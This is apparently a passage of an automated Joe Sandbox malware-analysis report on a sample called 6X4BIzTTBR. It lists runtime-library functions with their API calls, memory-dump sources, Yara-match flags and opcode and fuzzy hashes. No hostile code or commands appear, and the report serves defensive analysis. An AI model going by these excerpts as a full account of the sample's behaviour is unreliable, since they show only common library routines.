                                                      • Instruction Fuzzy Hash: 0C412931A02200FBFB306FB9CC44AAE3AE5EF56734F18C616F514D63D0E6B5B54152A1
                                                      Function 04706B14 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0470048A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 04706B61
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04706BEA
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04706BFC
                                                      • __freea.LIBCMT ref: 04706C05
                                                        • Part of subcall function 0470391E: RtlAllocateHeap.NTDLL(00000000,046DDAED,00000000), ref: 04703950
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                      • Instruction ID: 81c0bac2a009b3a743c9153523f7214d423757a441dfdb9dadbed5792f107035
                                                      • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                      • Instruction Fuzzy Hash: 7631AE72A0120AEBEF259F65CC54DAF7BE5EF00714B148228EC05DB290E735E964CB94
                                                      Function 00401FA7 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(00000005), ref: 00401FBC
                                                      • UpdateWindow.USER32 ref: 00401FC4
                                                      • ShowWindow.USER32(00000000), ref: 00401FD8
                                                      • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040203B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$MoveUpdate
                                                      • String ID:
                                                      • API String ID: 1339878773-0
                                                      • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                      • Instruction ID: c428200322f26a81849bf546b4fcc14a26d238e35443c7a5b73f5573142b5e50
                                                      • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                      • Instruction Fuzzy Hash: 5B016531E006109BC7258F19ED48A267BA7FFD5717B14803AE40C972B1D7B1AC42CB5C
                                                      Function 004290D9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004290F3
                                                        • Part of subcall function 00429040: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042906F
                                                        • Part of subcall function 00429040: ___AdjustPointer.LIBCMT ref: 0042908A
                                                      • _UnwindNestedFrames.LIBCMT ref: 00429108
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429119
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00429141
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction ID: 04bca70a23e8aa421aea465a109f941abb7c579c44f9fd7bd4db48d1de546229
                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction Fuzzy Hash: 3E016D72200159BBDF126E92DC42EEB3B69EF48758F444009FE4866121C73AEC71DBA8
                                                      Function 046F9340 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 046F935A
                                                        • Part of subcall function 046F92A7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 046F92D6
                                                        • Part of subcall function 046F92A7: ___AdjustPointer.LIBCMT ref: 046F92F1
                                                      • _UnwindNestedFrames.LIBCMT ref: 046F936F
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 046F9380
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 046F93A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction ID: 91cd66deee953f8f8af0987df4bc209065af796acb6b2aae043e2e90a980311e
                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction Fuzzy Hash: BA01C5B2100148BBEF125E95CC44EEB7B6AEF99758F044018FE8896120E632E865DBA5
                                                      Function 00434F3F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EE6,?,00000000,00000000,00000000,?,0043519E,00000006,FlsSetValue), ref: 00434F71
                                                      • GetLastError.KERNEL32(?,00434EE6,?,00000000,00000000,00000000,?,0043519E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FBC), ref: 00434F7D
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EE6,?,00000000,00000000,00000000,?,0043519E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F8B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction ID: 4ffff54916e95df9bb4cd853e13b135377d61247482a2d9abb472db46d9b4a44
                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction Fuzzy Hash: E201AC36615622ABC7214F69AC449A7B7D8AF8AF61F281531F905D7240D724E9018AE8
                                                      Function 047051A6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0470514D,00000000,00000000,00000000,00000000,?,04705405,00000006,0044A378), ref: 047051D8
                                                      • GetLastError.KERNEL32(?,0470514D,00000000,00000000,00000000,00000000,?,04705405,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,04702223), ref: 047051E4
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0470514D,00000000,00000000,00000000,00000000,?,04705405,00000006,0044A378,0044A370,0044A378,00000000), ref: 047051F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction ID: 70e80e2aaa53c651e364367cfeef5b0ba0c42b4f250086e7da4dd6b0ed3f3aa9
                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction Fuzzy Hash: 7901D476653222FBC721CF699C4495B7BD8AF06BA27114630F906D33C1D720E9008EE8
                                                      Function 0042613E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426158
                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042616C
                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426184
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042619C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                      • String ID:
                                                      • API String ID: 78362717-0
                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction ID: df61ad4429c22f19fa55f8ece888a23888cad9b6ddc7c598f6fa9154d18068c3
                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction Fuzzy Hash: C301F232700220BBCF12AE5A9801AFF77A99B84354F42041BFC05A7283CA64FD2196A8
                                                      Function 046F63A5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 046F63BF
                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 046F63D3
                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 046F63EB
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 046F6403
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                      • String ID:
                                                      • API String ID: 78362717-0
                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction ID: dd2f13c2baf86ef1cf58c3d87783ffa88d6e4d98470f2f44891e2e4e87baa8e2
                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction Fuzzy Hash: 7801D633700214A7DF16AE99CC40AAF77A9DF54254F000029EE51A7391FA70FD17A6A4
                                                      Function 046F2B92 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F2BC1
                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 046F2BDF
                                                        • Part of subcall function 046E8697: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 046E86B8
                                                        • Part of subcall function 046E8697: Hash.LIBCMT ref: 046E86F8
                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 046F2BE8
                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 046F2C08
                                                        • Part of subcall function 046EF6EF: Hash.LIBCMT ref: 046EF701
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                      • String ID:
                                                      • API String ID: 2250070497-0
                                                      • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                      • Instruction ID: 9deafc056ed0a25ac5e06ba9a929b9fbae70fa130240be7e739e60fa7129bfc6
                                                      • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                      • Instruction Fuzzy Hash: 9911CE77800200AFC715DFA5C8819DAFBF8AF19314F004A5EE65687291EB70F514CBA4
                                                      Function 046F2BA1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F2BC1
                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 046F2BDF
                                                        • Part of subcall function 046E8697: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 046E86B8
                                                        • Part of subcall function 046E8697: Hash.LIBCMT ref: 046E86F8
                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 046F2BE8
                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 046F2C08
                                                        • Part of subcall function 046EF6EF: Hash.LIBCMT ref: 046EF701
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                      • String ID:
                                                      • API String ID: 2250070497-0
                                                      • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                      • Instruction ID: 3a8d8b7a9cef126c6e932e18b238c5faacb3dffbadb08a6fdf114198c536f651
                                                      • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                      • Instruction Fuzzy Hash: E8018C76500604ABC714EFA5C881DDAF7F8FF09314F008A1EE65687240EB71F554CB64
                                                      Function 00405935 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0040593C
                                                        • Part of subcall function 0040BB5D: __EH_prolog3_GS.LIBCMT ref: 0040BB64
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405987
                                                      • __Getcoll.LIBCPMT ref: 00405996
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      • Opcode ID: 3e76e60c237fe12cfef498d76d88456176debc5cbed3055fffe5c89442b10ad7
                                                      • Instruction ID: a239ed34f7c57b44b3f26371b2ad5b9239dee305b2401fa4067dda74ad65f5a7
                                                      • Opcode Fuzzy Hash: 3e76e60c237fe12cfef498d76d88456176debc5cbed3055fffe5c89442b10ad7
                                                      • Instruction Fuzzy Hash: 34015771911208EFEB10EFA5D581B9DB7B0EF44328F10853EE455AB282CB789544CF99
                                                      Function 046D50E0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 046D50E7
                                                        • Part of subcall function 046DBDC4: __EH_prolog3_GS.LIBCMT ref: 046DBDCB
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D5132
                                                      • __Getcoll.LIBCPMT ref: 046D5141
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D5151
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      • Opcode ID: 0046e85425c010d8b55ddd9a7ce00c1e69b0a5aca6f291f5e48b90b11043b56a
                                                      • Instruction ID: 98f642efcb1ef5013f12a82ab9d371225409e6bb2dec570ee8be66e6f1e4bf3d
                                                      • Opcode Fuzzy Hash: 0046e85425c010d8b55ddd9a7ce00c1e69b0a5aca6f291f5e48b90b11043b56a
                                                      • Instruction Fuzzy Hash: 00017171D11308EFEB14EFA4D840BEDBBB4BF48319F10852DD046AB280EBB5A584CB95
                                                      Function 046D5B9C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 046D5BA3
                                                        • Part of subcall function 046DBDC4: __EH_prolog3_GS.LIBCMT ref: 046DBDCB
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D5BEE
                                                      • __Getcoll.LIBCPMT ref: 046D5BFD
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D5C0D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      • Opcode ID: 0b3d0b625c86f643de08f3413815b3da57695b249bc7b22f214979676ea3f6c4
                                                      • Instruction ID: ec909b59749ec9429de760363afea4e7bc5055b4250d3f35b6c0862e28a61a84
                                                      • Opcode Fuzzy Hash: 0b3d0b625c86f643de08f3413815b3da57695b249bc7b22f214979676ea3f6c4
                                                      • Instruction Fuzzy Hash: 11015E71D11309EFEB04EFA4D850B9DBBF4BF14319F10842DD046AB280EBB4A584CB99
                                                      Function 0041BEE7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Compare_exchange_acquire_4std::_
                                                      • String ID:
                                                      • API String ID: 3973403980-0
                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction ID: 90a00d74d7e95698428c051da65fd3e7bf319a60be3d66b32360873f0c6b23a2
                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction Fuzzy Hash: 0F01F63704414DBBCF129E64DD428EE3B26FB08354B148516FA18C4272C736DAB2AF8E
                                                      Function 046EC14E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC180
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC190
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC1A0
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC1B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Compare_exchange_acquire_4std::_
                                                      • String ID:
                                                      • API String ID: 3973403980-0
                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction ID: 47b9452bfb3314ffdcb554cd31b794f17bbd7d03300227d57853c5e9d23dfbd8
                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction Fuzzy Hash: 7001197A006249FBEF129F96DC018FD3BA6AF54254F048416FA1884230F333E671AB81
                                                      Function 0040D235 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110EB
                                                        • Part of subcall function 0041095D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041097F
                                                        • Part of subcall function 0041095D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109A0
                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110FE
                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041110A
                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411113
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                      • String ID:
                                                      • API String ID: 4284812201-0
                                                      • Opcode ID: 8f68c9da5acd4d3ff45d1509abaa83bc3cc08b57f830c3b6238d38548e373c0d
                                                      • Instruction ID: 3ee2b00ea52e543a79ea41801268a76b7771befbd77d74f306e84695894f5a80
                                                      • Opcode Fuzzy Hash: 8f68c9da5acd4d3ff45d1509abaa83bc3cc08b57f830c3b6238d38548e373c0d
                                                      • Instruction Fuzzy Hash: 80F02430A00205A7DB247BBA48536FE75864F85318B04413FFA12AB3D2DEBC9DC2929C
                                                      Function 0041351C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413535
                                                        • Part of subcall function 004128BF: ___crtGetTimeFormatEx.LIBCMT ref: 004128D5
                                                        • Part of subcall function 004128BF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128F4
                                                      • GetLastError.KERNEL32 ref: 00413551
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413567
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00413575
                                                        • Part of subcall function 00412695: SetThreadPriority.KERNEL32(?,?), ref: 004126A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                      • String ID:
                                                      • API String ID: 1674182817-0
                                                      • Opcode ID: 95a3cc24078eda52906d33d22a454012943d86f29ccad5a344fd010357cccaf2
                                                      • Instruction ID: 6cb4bfd5c0380e205a1044cac174ab521eca20d744c1281ff053aefd1e74bc03
                                                      • Opcode Fuzzy Hash: 95a3cc24078eda52906d33d22a454012943d86f29ccad5a344fd010357cccaf2
                                                      • Instruction Fuzzy Hash: 95F082B1A002253AEB24B6765D07FFB379C9B01B55F90081FB945E6182EDDCE54046BC
                                                      Function 046DD49C Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 046E1352
                                                        • Part of subcall function 046E0BC4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 046E0BE6
                                                        • Part of subcall function 046E0BC4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 046E0C07
                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 046E1365
                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 046E1371
                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 046E137A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                      • String ID:
                                                      • API String ID: 4284812201-0
                                                      • Opcode ID: b716257adace6d8d4e611db5c892aa721ff258e3b26a1b6d014efced0198429e
                                                      • Instruction ID: 6cffcac7a9f893fa4390d606186a34fae7625798eb4f0842ccd4ba40ad48dc53
                                                      • Opcode Fuzzy Hash: b716257adace6d8d4e611db5c892aa721ff258e3b26a1b6d014efced0198429e
                                                      • Instruction Fuzzy Hash: DAF0B431642214ABAB14BEB648605FE36D65F92758B08422ED5526B3C0FEB1BD01A698
                                                      Function 046E3783 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 046E379C
                                                        • Part of subcall function 046E2B26: ___crtGetTimeFormatEx.LIBCMT ref: 046E2B3C
                                                        • Part of subcall function 046E2B26: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 046E2B5B
                                                      • GetLastError.KERNEL32 ref: 046E37B8
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E37CE
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E37DC
                                                        • Part of subcall function 046E28FC: SetThreadPriority.KERNEL32(?,?), ref: 046E2908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                      • String ID:
                                                      • API String ID: 1674182817-0
                                                      • Opcode ID: 95a3cc24078eda52906d33d22a454012943d86f29ccad5a344fd010357cccaf2
                                                      • Instruction ID: 6a950a5d23b8a77eb8242d4f74f615e7aaa80d8363a550e33394da3ad1dd4139
                                                      • Opcode Fuzzy Hash: 95a3cc24078eda52906d33d22a454012943d86f29ccad5a344fd010357cccaf2
